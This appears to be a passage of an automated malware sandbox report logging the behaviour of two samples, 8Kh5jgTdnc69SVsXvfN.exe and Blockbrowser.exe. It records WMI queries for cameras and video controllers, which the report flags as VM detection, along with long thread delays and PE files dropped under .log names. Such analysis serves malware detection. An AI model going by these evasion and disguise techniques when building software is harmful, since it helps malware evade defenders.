Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\SavesHost\Blockbrowser.exe	Memory allocated: D80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Memory allocated: 1A990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Memory allocated: 1200000 memory reserve \| memory write watch
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Memory allocated: 1AD60000 memory reserve \| memory write watch

Source: C:\SavesHost\Blockbrowser.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 922337203685477
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 600000
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 599875
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 599762
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 599651
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 599547
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 599438
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 599328
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 599216
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 3600000
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 599103
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 598989
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 598860
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 598750
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 598641
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 598516
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 598404
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 598297
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 598187
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 598078
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 597969
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 597860
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 597735
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 597610
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 597485
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 597360
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 597235
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 597123
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 597013
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 596906
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 596797
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 596672
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 596562
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 596447
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 596344
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 596222
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 596094
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 595981
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 595875
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 595766
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 595656
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 595547
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 595437
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 595328
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 595219
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 595109
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 594983
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 594795
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 594532
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 594110
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 593983
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 593872
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 300000

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2827	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3042	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2783
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3158
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2951
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2441
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Window / User API: threadDelayed 4283
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Window / User API: threadDelayed 5474

Source: C:\SavesHost\Blockbrowser.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xJfQbpmT.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UQJnCrwb.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YYGwXJrX.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NzeXyGEM.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SnwWbCTA.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lpgkkzWs.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KxrpdWzR.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lxQDOiwy.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LipXSOru.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sCWCXWYE.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ezcDmTCJ.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XnIOiRzu.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JRXzWseY.log	Jump to dropped file
